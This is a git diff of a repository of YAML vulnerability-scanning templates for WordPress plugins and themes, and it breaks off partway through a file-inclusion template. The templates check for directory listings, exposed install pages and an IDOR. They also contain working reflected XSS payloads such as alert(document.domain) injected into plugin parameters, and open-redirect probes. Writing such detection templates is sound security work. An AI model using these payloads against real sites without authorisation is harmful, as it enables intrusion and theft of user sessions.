name: Altair WordPress theme v4.8 - Directory Listing
author: pussycat0x
severity: info
description: Searches for directories listing in the altair theme.
+ metadata:
+ max-request: 4
tags: wordpress,listing,wp-theme
-requests:
+
+http:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/altair/modules/"
- "{{BaseURL}}/wp-content/themes/altair/functions/"
- "{{BaseURL}}/wp-content/themes/altair/images/flip/"
- "{{BaseURL}}/wp-content/themes/altair/images/"
+
matchers-condition: and
matchers:
- type: word
@@ -19,6 +24,9 @@ requests:
- "Index of"
- "wp-content/themes/altair"
condition: and
+
- type: status
status:
- 200
+
+# digest: 4a0a00473045022100e261bbaacea967250f170f7f4832f2d9e594e3cfcb5b042d2d59b4ae9eb43a110220708e32b44f6c1163ddeb9bca68379fe9e8b75da75aa51de784b6d9af8ca061cf:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-altair-listing.yaml b/poc/wordpress/wp-altair-listing-11406.yaml
similarity index 100%
rename from poc/wordpress/wp-altair-listing.yaml
rename to poc/wordpress/wp-altair-listing-11406.yaml
diff --git a/poc/wordpress/wp-ambience-xss-11410.yaml b/poc/wordpress/wp-ambience-xss-11410.yaml
index 86d7748fdf..39cb2fdd1c 100644
--- a/poc/wordpress/wp-ambience-xss-11410.yaml
+++ b/poc/wordpress/wp-ambience-xss-11410.yaml
@@ -1,25 +1,41 @@
id: wp-ambience-xss
+
info:
- name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
+ name: WordPress Ambience Theme <=1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
+ description: |
+ WordPress Ambience Theme 1.0 and earlier was affected by a cross-site scripting vulnerability.
reference:
- - https://www.exploit-db.com/exploits/38568
- tags: wordpress,xss,wp-plugin
-requests:
+ - https://www.exploit-db.com/expl oits/38568
+ - https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cwe-id: CWE-80
+ metadata:
+ max-request: 1
+ tags: wp-plugin,wp,edb,wpscan,wordpress,xss
+
+http:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg'
+
matchers-condition: and
matchers:
- type: word
+ part: body
words:
- "<body onload=alert(1)>"
- part: body
+
- type: word
part: header
words:
- text/html
+
- type: status
status:
- 200
+
+# digest: 490a0046304402203fb7b1d0d2c856228bfc26419e29d704740b15c4ccacf410c01d5896c344bd1c022033d7214ebfcd644130284b7ccee68d9193260d467bd682f22cf8b309eb479dba:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-app-log-11413.yaml b/poc/wordpress/wp-app-log-11411.yaml
similarity index 100%
rename from poc/wordpress/wp-app-log-11413.yaml
rename to poc/wordpress/wp-app-log-11411.yaml
diff --git a/poc/wordpress/wp-arforms-listing-11415.yaml b/poc/wordpress/wp-arforms-listing-11415.yaml
new file mode 100644
index 0000000000..9cc330e796
--- /dev/null
+++ b/poc/wordpress/wp-arforms-listing-11415.yaml
@@ -0,0 +1,22 @@
+id: wp-arforms-listing
+info:
+ name: WordPress Plugin Arforms Listing
+ author: pussycat0x
+ severity: info
+ description: Searches for sensitive directories present in the wordpress-plugins plugin.
+ reference: https://www.exploit-db.com/ghdb/6424
+ tags: wordpress,listing
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arforms/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of"
+ - "wp-content/plugins/arforms/"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wp-arforms-listing-11417.yaml b/poc/wordpress/wp-arforms-listing.yaml
similarity index 100%
rename from poc/wordpress/wp-arforms-listing-11417.yaml
rename to poc/wordpress/wp-arforms-listing.yaml
diff --git a/poc/wordpress/wp-church-admin-xss-11419.yaml b/poc/wordpress/wp-church-admin-xss-11419.yaml
deleted file mode 100644
index 350e16aad1..0000000000
--- a/poc/wordpress/wp-church-admin-xss-11419.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: wp-church-admin-xss
-info:
- name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference: https://www.securityfocus.com/bid/54329/info
- tags: wordpress,xss,wp-plugin
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "</script><script>alert(document.domain)</script>"
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wp-code-snippets-xss-11425.yaml b/poc/wordpress/wp-code-snippets-xss-11425.yaml
new file mode 100644
index 0000000000..e8d6ab0586
--- /dev/null
+++ b/poc/wordpress/wp-code-snippets-xss-11425.yaml
@@ -0,0 +1,50 @@
+id: wp-code-snippets-xss
+
+info:
+ name: WordPress Code Snippets - Cross-Site Scripting
+ author: dhiyaneshDK
+ severity: medium
+ description: WordPress Code Snippets plugin contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ reference:
+ - https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cwe-id: CWE-80
+ metadata:
+ max-request: 2
+ tags: wordpress,xss,wp-plugin,authenticated
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/admin.php?page=snippets&tag=</script><script>alert(document.domain)</script> HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '</script><script>alert(document.domain)</script>'
+ - 'toplevel_page_snippets'
+ - 'Search results in tag'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a004730450221008d2f407e72ae3777c6f804c5ffc234ab5d73c7cbb7ff65d90c46c68db7d23bd502206e8386152273c3bf23bee6ba0097f03efac95c1d559b795ef2a3703aa7c1ac08:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/wordpress/wp-code-snippets-xss.yaml b/poc/wordpress/wp-code-snippets-xss.yaml
deleted file mode 100644
index b3552bcadb..0000000000
--- a/poc/wordpress/wp-code-snippets-xss.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: wp-code-snippets-xss
-info:
- name: Code Snippets Wordpress Plugin - XSS
- author: dhiyaneshDK
- severity: medium
- description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any logged-in admin who views the link
- reference: https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/
- tags: wordpress,xss,wp-plugin,authenticated
-requests:
- - raw:
- - |
- POST /wp-login.php HTTP/1.1
- Host: {{Hostname}}
- Origin: {{RootURL}}
- Content-Type: application/x-www-form-urlencoded
- Cookie: wordpress_test_cookie=WP%20Cookie%20check
-
- log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- - |
- GET /wp-admin/admin.php?page=snippets&tag=</script><script>alert(document.domain)</script> HTTP/1.1
- Host: {{Hostname}}
- cookie-reuse: true
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '</script><script>alert(document.domain)</script>'
- - type: word
- part: header
- words:
- - "text/html"
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wp-config-setup-11427.yaml b/poc/wordpress/wp-config-setup-11427.yaml
index ca21c2f30d..f7b513af91 100644
--- a/poc/wordpress/wp-config-setup-11427.yaml
+++ b/poc/wordpress/wp-config-setup-11427.yaml
@@ -4,7 +4,7 @@ info:
author: princechaddha
severity: high
reference: https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/
- tags: wordpress,setup
+ tags: wordpress
requests:
- method: GET
path:
diff --git a/poc/wordpress/wp-config-setup.yaml b/poc/wordpress/wp-config-setup.yaml
index 3ef91520f3..ca21c2f30d 100644
--- a/poc/wordpress/wp-config-setup.yaml
+++ b/poc/wordpress/wp-config-setup.yaml
@@ -1,28 +1,19 @@
id: wp-config-setup
-
info:
name: WordPress Setup Configuration
author: princechaddha
severity: high
- reference:
- - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/
- metadata:
- max-request: 1
+ reference: https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/
tags: wordpress,setup
-
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/setup-config.php?step=1"
-
matchers-condition: and
matchers:
- type: word
words:
- "Below you should enter your database connection details."
-
- type: status
status:
- 200
-
-# digest: 4b0a00483046022100e979a8be5bb6a555e42d5d6d7e12f302f4a0a0f20ac4bdf0da56786206432cbb022100b26fd2d09915a684fcb09f935ad6af161008ff39c7f3d094484a20a7c1008ba3:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-custom-tables-xss-11433.yaml b/poc/wordpress/wp-custom-tables-xss-11433.yaml
new file mode 100644
index 0000000000..cae9eef28f
--- /dev/null
+++ b/poc/wordpress/wp-custom-tables-xss-11433.yaml
@@ -0,0 +1,26 @@
+id: wp-custom-tables-xss
+info:
+ name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability
+ reference:
+ - https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252
+ tags: wordpress,xss,wp-plugin
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "</script><script>alert(document.domain)</script>"
+ part: body
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wp-custom-tables-xss-11435.yaml b/poc/wordpress/wp-custom-tables-xss-11435.yaml
deleted file mode 100644
index 958241da6b..0000000000
--- a/poc/wordpress/wp-custom-tables-xss-11435.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: wp-custom-tables-xss
-
-info:
- name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability
- reference: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252
- tags: wordpress,xss,wp-plugin
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "</script><script>alert(document.domain)</script>"
- part: body
-
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wp-email-subscribers-listing-11440.yaml b/poc/wordpress/wp-email-subscribers-listing-11440.yaml
index 01c60a37cb..2fbf8318f7 100644
--- a/poc/wordpress/wp-email-subscribers-listing-11440.yaml
+++ b/poc/wordpress/wp-email-subscribers-listing-11440.yaml
@@ -5,7 +5,7 @@ info:
severity: low
description: Searches for sensitive directories present in the wordpress-plugins plugin.
reference: https://www.exploit-db.com/ghdb/6428
- tags: wordpress,listing,plugin
+ tags: wordpress,listing
requests:
- method: GET
path:
diff --git a/poc/wordpress/wp-email-subscribers-listing-11442.yaml b/poc/wordpress/wp-email-subscribers-listing-11442.yaml
index 3752821e40..1b94bfcf99 100644
--- a/poc/wordpress/wp-email-subscribers-listing-11442.yaml
+++ b/poc/wordpress/wp-email-subscribers-listing-11442.yaml
@@ -1,16 +1,21 @@
id: wp-email-subscribers-listing
+
info:
name: WordPress Plugin Email Subscribers Listing
author: pussycat0x
severity: low
- description: Searches for sensitive directories present in the wordpress-plugins plugin.
+ description: Searches for sensitive directories present in the email-subscribers plugin.
reference:
- https://www.exploit-db.com/ghdb/6428
- tags: wordpress,listing,plugin
-requests:
+ metadata:
+ max-request: 1
+ tags: wordpress,listing,plugin,edb
+
+http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/email-subscribers"
+
matchers-condition: and
matchers:
- type: word
@@ -18,6 +23,9 @@ requests:
- "Index of"
- "wp-content/plugins/email-subscribers"
condition: and
+
- type: status
status:
- 200
+
+# digest: 490a0046304402202d493e9b232b92bbbccce47ff8ea6473ba602f5ba221a0d212f1163ece18ad7402207a70c9e0a434ac5df1e55b67c898e89f495bce6da66ef492e471ecf0c2894eb7:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-email-subscribers-listing-11443.yaml b/poc/wordpress/wp-email-subscribers-listing-11443.yaml
new file mode 100644
index 0000000000..01c60a37cb
--- /dev/null
+++ b/poc/wordpress/wp-email-subscribers-listing-11443.yaml
@@ -0,0 +1,22 @@
+id: wp-email-subscribers-listing
+info:
+ name: WordPress Plugin Email Subscribers Listing
+ author: pussycat0x
+ severity: low
+ description: Searches for sensitive directories present in the wordpress-plugins plugin.
+ reference: https://www.exploit-db.com/ghdb/6428
+ tags: wordpress,listing,plugin
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/email-subscribers"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of"
+ - "wp-content/plugins/email-subscribers"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wp-finder-xss-11449.yaml b/poc/wordpress/wp-finder-xss-11449.yaml
index 0111970059..83725e6f8f 100644
--- a/poc/wordpress/wp-finder-xss-11449.yaml
+++ b/poc/wordpress/wp-finder-xss-11449.yaml
@@ -1,24 +1,39 @@
id: wp-finder-xss
+
info:
- name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS)
+ name: WordPress Finder - Cross-Site Scripting
author: daffainfo
- severity: medium
- reference: https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html
- tags: wordpress,xss,wp-plugin
-requests:
+ severity: high
+ description: WordPress Plugin Finder contains a cross-site scripting vulnerability via the order parameter. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ reference:
+ - https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cwe-id: CWE-79
+ metadata:
+ max-request: 1
+ tags: xss,wp-plugin,packetstorm,wordpress
+
+http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
+
- type: word
part: header
words:
- text/html
+
- type: status
status:
- 200
+
+# digest: 4b0a00483046022100d683db2d444c5d5fc720da280ffe5abb96984a1e77cbb5efcfd4c7e961995da9022100e93777cef38866591b3d9f5b169abeba524469238bce4886fcb358db947c8d7f:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-full-path-disclosure.yaml b/poc/wordpress/wp-full-path-disclosure.yaml
index 24ce07f4e7..2909076981 100644
--- a/poc/wordpress/wp-full-path-disclosure.yaml
+++ b/poc/wordpress/wp-full-path-disclosure.yaml
@@ -1,5 +1,4 @@
id: wp-full-path-disclosure
-
info:
name: Wordpress - Path Disclosure
author: arcc
@@ -7,19 +6,13 @@ info:
reference:
- https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/#why-are-there-path-disclosures-when-directly-loading-certain-files
- https://core.trac.wordpress.org/ticket/38317
- metadata:
- max-request: 1
tags: debug,wordpress,fpd
-
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/wp-includes/rss-functions.php"
-
matchers:
- type: word
words:
- 'Call to undefined function _deprecated_file()'
part: body
-
-# digest: 4b0a00483046022100801bbde5d695128c523449e3f13cbcfbdbc6fac825395e2524cd6b020c4e401e022100b3912dc6c4be228a8c60c03136e6707c7b5482f0b095c9c1c530eed718f0862f:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-grimag-open-redirect-11460.yaml b/poc/wordpress/wp-grimag-open-redirect-11460.yaml
index 20ac245e37..e100c092a2 100644
--- a/poc/wordpress/wp-grimag-open-redirect-11460.yaml
+++ b/poc/wordpress/wp-grimag-open-redirect-11460.yaml
@@ -1,30 +1,21 @@
id: wp-grimag-open-redirect
info:
- name: WordPress Grimag <1.1.1 - Open Redirection
+ name: WordPress Grimag Themes < 1.1.1 Open Redirection
author: 0x_Akoko
- severity: medium
- description: WordPress Grimag theme before 1.1.1 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
- remediation: Fixed in 1.1.1.
+ severity: low
+ description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability.
reference:
- https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cwe-id: CWE-601
- metadata:
- max-request: 1
- tags: wp-theme,redirect,wpscan,wordpress
+ tags: wordpress,wp-theme,redirect
-http:
+requests:
- method: GET
path:
- - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://interact.sh"
+ - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://example.com"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header
-
-# digest: 4a0a00473045022100d40ec63c134265020e2c32431122360fc45c7638ad3697c5ce3f42982b1cd01b02207e07120720fc907481b2c0530ce58a1079e47bc99d77fb5c35a578ccc5bce04b:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-grimag-open-redirect-11458.yaml b/poc/wordpress/wp-grimag-open-redirect.yaml
similarity index 100%
rename from poc/wordpress/wp-grimag-open-redirect-11458.yaml
rename to poc/wordpress/wp-grimag-open-redirect.yaml
diff --git a/poc/wordpress/wp-gtranslate-open-redirect-11463.yaml b/poc/wordpress/wp-gtranslate-open-redirect-11463.yaml
index 3db87c4aa6..0339723a0c 100644
--- a/poc/wordpress/wp-gtranslate-open-redirect-11463.yaml
+++ b/poc/wordpress/wp-gtranslate-open-redirect-11463.yaml
@@ -1,21 +1,34 @@
id: wp-gtranslate-open-redirect
+
info:
- name: GTranslate < 2.8.11 - Unauthenticated Open Redirect
+ name: WordPress GTranslate <2.8.11 - Open Redirect
author: dhiyaneshDK
severity: medium
- description: The Translate WordPress with GTranslate WordPress plugin was affected by an Unauthenticated Open Redirect security vulnerability.
+ description: Translate WordPress with GTranslate plugin before 2.8.11 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+ reference:
+ - https://www.pluginvulnerabilities.com/2017/02/17/open-redirect-vulnerability-in-gtranslate/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cwe-id: CWE-601
+ metadata:
+ max-request: 1
tags: redirect,wordpress
- reference: https://www.pluginvulnerabilities.com/2017/02/17/open-redirect-vulnerability-in-gtranslate/
-requests:
+
+http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com'
+
matchers-condition: and
matchers:
- type: word
words:
- "Location: www.pluginvulnerabilities.com"
part: header
+
- type: status
status:
- 301
+
+# digest: 4a0a00473045022100dd22f166aaf34cfd472afe64395a024817dbabe56e7c1e429cda2980ec2bbf3a022015dde82965d7c111a9531a8af3a4a53d59f442849e3d937a18f407153fb65674:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-gtranslate-open-redirect-11466.yaml b/poc/wordpress/wp-gtranslate-open-redirect-11466.yaml
new file mode 100644
index 0000000000..bd1ff9afa2
--- /dev/null
+++ b/poc/wordpress/wp-gtranslate-open-redirect-11466.yaml
@@ -0,0 +1,22 @@
+id: wp-gtranslate-open-redirect
+info:
+ name: GTranslate < 2.8.11 - Unauthenticated Open Redirect
+ author: dhiyaneshDK
+ severity: medium
+ description: The Translate WordPress with GTranslate WordPress plugin was affected by an Unauthenticated Open Redirect security vulnerability.
+ tags: redirect,wordpress
+ reference: https://www.pluginvulnerabilities.com/2017/02/17/open-redirect-vulnerability-in-gtranslate/
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Location: www.pluginvulnerabilities.com"
+ part: header
+
+ - type: status
+ status:
+ - 301
diff --git a/poc/wordpress/wp-haberadam-idor-11467.yaml b/poc/wordpress/wp-haberadam-idor-11467.yaml
new file mode 100644
index 0000000000..c933e6ab2a
--- /dev/null
+++ b/poc/wordpress/wp-haberadam-idor-11467.yaml
@@ -0,0 +1,32 @@
+id: wp-haberadam-idor
+info:
+ name: WordPress Themes Haberadam IDOR and Full Path Disclosure via JSON API
+ author: pussycat0x
+ severity: low
+ reference: https://cxsecurity.com/issue/WLB-2021090078
+ metadata:
+ google-dork: inurl:/wp-content/themes/haberadam/
+ tags: wordpress,idor,wp-theme,disclosure
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/themes/haberadam/api/mobile-info.php?id='
+ - '{{BaseURL}}/blog/wp-content/themes/haberadam/api/mobile-info.php?id='
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"status"'
+ - '"hava"'
+ - '"degree"'
+ - '"icon"'
+ condition: and
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/poc/wordpress/wp-haberadam-idor-11468.yaml b/poc/wordpress/wp-haberadam-idor-11468.yaml
deleted file mode 100644
index 1b828533bd..0000000000
--- a/poc/wordpress/wp-haberadam-idor-11468.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: wp-haberadam-idor
-info:
- name: WordPress Themes Haberadam JSON API - IDOR and Path Disclosure
- author: pussycat0x
- severity: low
- reference:
- - https://cxsecurity.com/issue/WLB-2021090078
- metadata:
- google-dork: inurl:/wp-content/themes/haberadam/
- tags: wordpress,idor,wp-theme,disclosure
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/themes/haberadam/api/mobile-info.php?id='
- - '{{BaseURL}}/blog/wp-content/themes/haberadam/api/mobile-info.php?id='
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - '"status"'
- - '"hava"'
- - '"degree"'
- - '"icon"'
- condition: and
- - type: status
- status:
- - 200
- - type: word
- part: header
- words:
- - text/html
diff --git a/poc/wordpress/wp-haberadam-idor.yaml b/poc/wordpress/wp-haberadam-idor.yaml
index c933e6ab2a..7832b14743 100644
--- a/poc/wordpress/wp-haberadam-idor.yaml
+++ b/poc/wordpress/wp-haberadam-idor.yaml
@@ -1,18 +1,24 @@
id: wp-haberadam-idor
+
info:
- name: WordPress Themes Haberadam IDOR and Full Path Disclosure via JSON API
+ name: WordPress Themes Haberadam JSON API - IDOR and Path Disclosure
author: pussycat0x
severity: low
- reference: https://cxsecurity.com/issue/WLB-2021090078
+ reference:
+ - https://cxsecurity.com/issue/WLB-2021090078
metadata:
- google-dork: inurl:/wp-content/themes/haberadam/
+ max-request: 2
+ google-query: inurl:/wp-content/themes/haberadam/
tags: wordpress,idor,wp-theme,disclosure
-requests:
+
+http:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/haberadam/api/mobile-info.php?id='
- '{{BaseURL}}/blog/wp-content/themes/haberadam/api/mobile-info.php?id='
+
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: word
@@ -23,10 +29,14 @@ requests:
- '"degree"'
- '"icon"'
condition: and
+
- type: status
status:
- 200
+
- type: word
part: header
words:
- text/html
+
+# digest: 4a0a00473045022100d9e8e93b959b19bfd97ed5cd26aa422c7c43479e377c47e585b21cc373d67569022047b39f6bc5f1102233c9c860ebfbd32cd7c23818903195ffbbda038a7e0ef149:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-idx-broker-platinum-listing-11469.yaml b/poc/wordpress/wp-idx-broker-platinum-listing-11469.yaml
index bee377c8d3..f281d4d0e1 100644
--- a/poc/wordpress/wp-idx-broker-platinum-listing-11469.yaml
+++ b/poc/wordpress/wp-idx-broker-platinum-listing-11469.yaml
@@ -5,7 +5,7 @@ info:
severity: info
description: Searches for sensitive directories present in the wordpress-plugins plugin.
reference: https://www.exploit-db.com/ghdb/6416
- tags: wordpress,listing,plugin
+ tags: wordpress,listing
requests:
- method: GET
path:
diff --git a/poc/wordpress/wp-install-11473.yaml b/poc/wordpress/wp-install-11473.yaml
new file mode 100644
index 0000000000..9fa2e9ac3b
--- /dev/null
+++ b/poc/wordpress/wp-install-11473.yaml
@@ -0,0 +1,21 @@
+id: wp-install
+info:
+ name: WordPress Exposed Installation
+ author: princechaddha
+ severity: high
+ reference: https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/
+ tags: wordpress
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/install.php"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "<title>WordPress › Installation"
+ - "Site Title"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wp-install-11475.yaml b/poc/wordpress/wp-install-11475.yaml
deleted file mode 100644
index e34f2e2637..0000000000
--- a/poc/wordpress/wp-install-11475.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: wp-install
-info:
- name: WordPress Exposed Installation
- author: princechaddha
- severity: high
- reference:
- - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/
- tags: wordpress
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-admin/install.php"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "WordPress › Installation"
- - "Site Title"
- condition: and
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wp-install.yaml b/poc/wordpress/wp-install.yaml
index 9fa2e9ac3b..e34f2e2637 100644
--- a/poc/wordpress/wp-install.yaml
+++ b/poc/wordpress/wp-install.yaml
@@ -3,7 +3,8 @@ info:
name: WordPress Exposed Installation
author: princechaddha
severity: high
- reference: https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/
+ reference:
+ - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/
tags: wordpress
requests:
- method: GET
diff --git a/poc/wordpress/wp-iwp-client-listing-11478.yaml b/poc/wordpress/wp-iwp-client-listing-11478.yaml
new file mode 100644
index 0000000000..09a4b058bf
--- /dev/null
+++ b/poc/wordpress/wp-iwp-client-listing-11478.yaml
@@ -0,0 +1,31 @@
+id: wp-iwp-client-listing
+
+info:
+ name: WordPress Plugin Iwp-client Listing
+ author: pussycat0x
+ severity: info
+ description: Searches for sensitive directories present in the iwp-client plugin.
+ reference:
+ - https://www.exploit-db.com/ghdb/6427
+ metadata:
+ max-request: 1
+ tags: wordpress,listing,plugin,edb
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/iwp-client/"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of"
+ - "wp-content/plugins/iwp-client/"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# digest: 490a0046304402204561cb16c2d173488139989f893bcd8f50ac7877d77360bd7f9026cfdb96b5db022048fb10551ef70047c675a60f84e33481f13cbeca9f25a75285c49cdf0f51f4ea:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-javospot-lfi-11480.yaml b/poc/wordpress/wp-javospot-lfi-11480.yaml
index bbacef80f0..6786157651 100644
--- a/poc/wordpress/wp-javospot-lfi-11480.yaml
+++ b/poc/wordpress/wp-javospot-lfi-11480.yaml
@@ -1,27 +1,18 @@
id: wp-javospot-lfi
-
info:
- name: WordPress Javo Spot Premium Theme - Local File Inclusion
+ name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
author: 0x_Akoko
severity: high
- description: WordPress Javo Spot Premium Theme is vulnerable to local file inclusion that allows remote unauthenticated attackers access to locally stored file and return their content.
